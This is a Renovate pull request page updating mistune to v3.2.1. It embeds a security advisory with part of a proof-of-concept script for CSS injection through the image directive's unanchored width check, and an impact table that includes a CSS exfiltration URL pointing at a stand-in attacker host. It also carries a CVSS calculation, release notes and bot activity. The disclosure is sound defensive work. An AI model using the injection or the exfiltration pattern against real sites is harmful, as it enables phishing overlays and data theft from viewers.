body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.warn{background:#fffbeb;border:1px solid #fbbf24;border-radius:6px;padding:10px 16px;
      font-size:.85em;color:#92400e;margin:12px 0}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;
      box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit  .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;
    font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;
          background:#fff;font-size:.9em;position:relative;overflow:hidden;height:180px}
/* scope the live-render sandbox so position:fixed stays inside the box */
.sandbox{position:relative;width:100%;height:100%}
.sandbox img{max-width:100%;max-height:100%;object-fit:contain}
/* override position:fixed on exploit img to keep it inside the preview box */
.sandbox img[style*="position:fixed"]{position:absolute!important;width:100%!important;
  height:100%!important;top:0!important;left:0!important}
"""

def case(kind, label, filename, src, out):
    header = "BASELINE" if kind == "baseline" else "EXPLOIT"
    sandbox = f'<div class="sandbox">{out}</div>'
    return f"""
<div class="case {kind}">
  <div class="case-header">{header} — {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>Output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ live render (sandboxed to preview box)</div>
      <div class="rendered">{sandbox}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H6 — Image CSS Injection</title><style>{CSS}</style></head><body>
<h1>H6 — Image Directive CSS Injection</h1>
<p class="desc">
  <code>_parse_attrs()</code> in <code>directives/image.py</code> validates
  <code>:width:</code> / <code>:height:</code> with <code>_num_re.match()</code>
  (prefix-only — no <code>$</code> anchor). Anything after the leading digits
  is accepted verbatim and written straight into a <code>style=</code> attribute.
  A single <code>:width:</code> option is sufficient to smuggle an arbitrary
  CSS chain: <strong>position:fixed · background-color · outline colour · full-viewport overlay</strong>.
</p>
<div class="warn">
  ⚠ The EXPLOIT preview below is sandboxed inside its box.
  In a real document the crimson overlay would cover the <em>entire browser window</em>.
</div>
{case("baseline",
      "Integer dims → clean width/height= attributes, no style=",
      bl_file, bl_src, bl_out)}
{case("exploit",
      ":width: carries position:fixed + background-color + outline → full-viewport coloured overlay",
      ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h6.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example usage:

python poc.py

Once you run the script, open report_h6.html in the browser and observe the behaviour.

Impact

Dimension	Assessment
Confidentiality	CSS-based data exfiltration via `background-image: url(https://attacker.com/?leak=...)` is possible in some browser/CSP configurations
Integrity	Full-viewport overlay enables complete UI replacement: phishing login forms, fake alerts, click-jacking, brand impersonation
Availability	The overlay obscures all page content until the user dismisses it or navigates away

Real-world impact scenario: An attacker posts a Markdown document to a platform (wiki, issue tracker, documentation site) that renders mistune with the Image directive. Any user who views the page sees a full-screen crimson overlay matching the attacker's design, replacing or concealing the legitimate page content. The overlay can contain a convincing login prompt, survey form, or urgent warning designed to capture credentials.

Severity

CVSS Score: 4.7 / 10 (Medium)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
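To check the score against the vector, the sketch below applies the base score equations from the CVSS v3.1 specification to the vector string above. The function and dictionary names are illustrative, and the parser assumes a well-formed base vector with no temporal or environmental metrics.

```python
import math

# Metric weights from the CVSS v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
# Privileges Required is weighted differently when Scope is changed.
PR = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, following the v3.1 Roundup definition."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    # Drop the "CVSS:3.1" prefix and split the rest into metric/value pairs.
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    scope = metrics["S"]
    iss = 1 - (
        (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    )
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = (
        8.22
        * AV[metrics["AV"]]
        * AC[metrics["AC"]]
        * PR[scope][metrics["PR"]]
        * UI[metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if scope == "C":
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N"))
```

For this vector the function evaluates to 4.7, which agrees with the listed score.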

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

lepture/mistune (mistune)

`v3.2.1`

Compare Source

🐞 Bug Fixes

Resolve Windows compatibility issues in file inclusion and tests - by @Yuki9814 (25471)
Escape html text - by @lepture (a3cb6)
Update link reference - by @lepture (85eb5)
Handle escaped dollar signs in inline math - by @saschabuehrle in #370 (7bd57)
Escape id of toc - by @lepture (04880)
Escape id of headings - by @lepture (28556)
Remove double-encoding of image alt text - by @lawrence3699 (0d6f3)
Escape xml for math plugin - by @lepture (5fa09)
Use strict regex for image's height and width - by @lepture (8d0cb)

View changes on GitHub

Configuration

📅 Schedule: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

github-actions · 2026-05-08T07:06:30Z

☂️ Python Coverage

current status: ✅

Overall Coverage

Lines	Covered	Coverage	Threshold	Status
4965	3560	72%	60%	🟢

New Files

No new covered files...

Modified Files

No covered modified files...

updated for commit: 1f4972c by action🐍

renovate Bot requested review from a team as code owners May 8, 2026 07:03

renovate Bot temporarily deployed to dev May 8, 2026 07:03 Inactive

renovate Bot changed the title ~~chore(deps): update dependency mistune to v3.2.1 [security]~~ chore(deps): update dependency mistune to v3.2.1 [security] - autoclosed May 27, 2026

renovate Bot closed this May 27, 2026

renovate Bot deleted the renovate/pypi-mistune-vulnerability branch May 27, 2026 18:08

chore(deps): update dependency mistune to v3.2.1 [security]

1f4972c

renovate Bot changed the title ~~chore(deps): update dependency mistune to v3.2.1 [security] - autoclosed~~ chore(deps): update dependency mistune to v3.2.1 [security] May 28, 2026

renovate Bot reopened this May 28, 2026

renovate Bot force-pushed the renovate/pypi-mistune-vulnerability branch 2 times, most recently from 34c5933 to 1f4972c Compare May 28, 2026 21:17

renovate Bot deployed to dev May 28, 2026 21:17 Active

renovate[bot] wants to merge 1 commit into main from renovate/pypi-mistune-vulnerability
